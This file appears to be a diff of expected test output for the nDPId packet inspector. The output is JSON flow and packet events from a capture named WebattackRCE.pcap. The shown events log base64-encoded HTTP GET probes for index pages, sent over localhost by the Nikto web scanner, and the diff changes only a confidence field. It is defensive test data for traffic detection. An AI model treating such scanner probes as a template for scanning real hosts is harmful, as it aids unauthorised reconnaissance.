00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1576420276810,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276810,"pkt":"AAAAAAAAAAAAAAAACABFAADH5lRAAEAGVdp\/AAABfwAAAcJEH5B9+95hKQN6FIAYAED+uwAAAQEICp1m+3KdZvtyR0VUIC9pbmRleC5odG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1576420276812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276812,"pkt":"AAAAAAAAAAAAAAAACABFAADGlhlAAEAGphZ\/AAABfwAAAcJGH5DYta4lttm384AYAED+ugAAAQEICp1m+3OdZvtzR0VUIC9pbmRleC5odG0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1576420276813,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276813,"pkt":"AAAAAAAAAAAAAAAACABFAADI2h9AAEAGYg5\/AAABfwAAAcJIH5At6uIveFvtbIAYAED+vAAAAQEICp1m+3WdZvt1R0VUIC9pbmRleC5zaHRtbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.shtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.shtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1576420276815,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276815,"pkt":"AAAAAAAAAAAAAAAACABFAADGtzZAAEAGhPl\/AAABfwAAAcJKH5BukY8IX6sJe4AYAED+ugAAAQEICp1m+3edZvt2R0VUIC9pbmRleC5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1576420276817,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276817,"pkt":"AAAAAAAAAAAAAAAACABFAADGzfJAAEAGbj1\/AAABfwAAAcJMH5CEyfXFi\/ZWqoAYAED+ugAAAQEICp1m+3mdZvt5R0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1576420276819,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276819,"pkt":"AAAAAAAAAAAAAAAACABFAADFj3JAAEAGrL5\/AAABfwAAAcJOH5DAfLdF0MycV4AYAED+uQAAAQEICp1m+3udZvt7R0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1576420276820,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276820,"pkt":"AAAAAAAAAAAAAAAACABFAADG77xAAEAGTHN\/AAABfwAAAcJQH5DIa9eQqgE4nYAYAED+ugAAAQEICp1m+3ydZvt8R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1576420276821,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276821,"pkt":"AAAAAAAAAAAAAAAACABFAADHQ2dAAEAG+Md\/AAABfwAAAcJSH5BEZHtRsCeOn4AYAED+uwAAAQEICp1m+32dZvt9R0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCg0K"} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 